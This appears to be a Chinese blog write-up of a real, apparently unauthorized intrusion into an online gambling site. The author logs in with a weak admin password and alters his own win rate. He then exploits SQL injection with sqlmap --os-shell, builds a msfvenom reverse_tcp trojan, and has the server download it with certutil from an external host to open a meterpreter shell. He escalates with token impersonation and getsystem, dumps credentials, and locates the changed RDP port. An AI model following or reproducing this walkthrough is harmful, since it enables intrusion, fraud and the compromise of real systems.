新秀# 资讯

实战渗透之对某棋牌站点的一次检测

0x01-序言
48677-o9xzr7iw1uj.png

在某某附近人发来送¥的邀请截图

在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后

0x02-开打

开局一个后台

06416-uwnjijtyp.png

界面挺不错的有点高级高级的感觉

咱先来试试弱口令

09427-qhm85oafk9e.png

咦....直接进去了

随后把账户的胜利调到了百分比

03156-4c1jbz2xoou.png

50465-09ycnub65vcr.png

打了一上午鱼之后,金币高达52w

突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧

渗透棋牌不登陆到服务器界面怎么合适呢

咳咳...继续渗透

后台没有上传点 配置文件也不知道路径在哪 ...有点棘手

我们回到登陆框 在账户上加个单引号试试看看有没有sql注入

42842-ss2vvu56bhe.png

嗯哼..点登陆没反应抓包sqlmap一把梭

40646-6x2m0pifkue.png

嗯...很强 存在延时注入

我们继续看看是否dba权限

45657-06s5e1l2ra1.png

ture看来运气很好啊 直接--os-shell

17906-12z6dw43qqog.png

权限有点小啊 ,,,但问题不大 掏出我们的msf

msfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马

放置外网方便使我们的目标服务器下载

先在目标服务器创建一个放置木马的文件夹

md c:test

我们使用certutil.exe进行下载

certutil.exe -urlcache -split -f “木马下载地址” C:testtest.exe

67324-q6hqrw5zs2.png

木马下载成功我们回到msf

设置使用exploit/multi/handler模块

13508-7rrtvljh4rd.png

设置payload

37278-qckllhcarem.png

show options 看看需要配置的参数

83741-t3f0zorryha.png

set LHOST “外网ip” //与木马的ip一致

set LPORT "端口" //与木马的监听端口一致

随后 run执行

65734-4nw7zj4opvj.png

紧接着目标服务器运行木马

86648-jrcg73ig0lo.png

成功反弹shell

93234-fpp47xe4mw.png

80859-llp0m2ejgu7.png

因为我们的权限太小所以我们现在要先进行提权

使用use incognito来加载会话令牌模块

然后list_tokens -u来列出会话令牌

66533-7qje4yimy1.png

使用impersonate_token "WIN-IGSV8O3CA7EAdministrator" 盗取 administrator 令牌 getuid查看一下

79076-6xhmw9i1ib.png

嘿嘿嘿

最最最后使用getsystem来获取system权限

14805-oeucrdzeyy.png

咳咳 接下来就是shell进入

08595-jri64ywby9.png

cmd提取命令一把梭

接下来就是快快乐乐的登陆远程服务器了

美滋滋的~~

(然而事情没那么简单~)

咦....

70486-cgb89jmmumc.png

内部出现错误 咋回事了....难道远程端口被改了吗。。。。

使用nmap扫描一下开放端口

31529-wgleeart6nm.png

没有开放3389 ...... 确定以及肯定是改端口了我们回到shell看看

执行 tasklist /svc

找到svchost.exe进程下termservice服务对应的PID

48762-2snmgr4gyw6.png

再执行netstat -ano

根据PID号查找对应远程端口,远程端口为5566端口

97892-0pg29hq0zyze.png

嘿~这次能完美手工了吧

10732-hzqhmgzsbe.png

45941-aa9sop47lub.png

Very Good~

实战渗透(1)棋牌(1)棋牌站点(1)检测(2)渗透(102)
本文来源 白帽子搞安全,由 congtou 整理编辑,其版权均为 白帽子搞安全 如需转载,请注明文章来源。

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
CFS三层靶机渗透
« 上一篇 05-09
ubuntu 设置默认root用户
下一篇 » 05-09

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...

基于社工的钓鱼研究

声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的...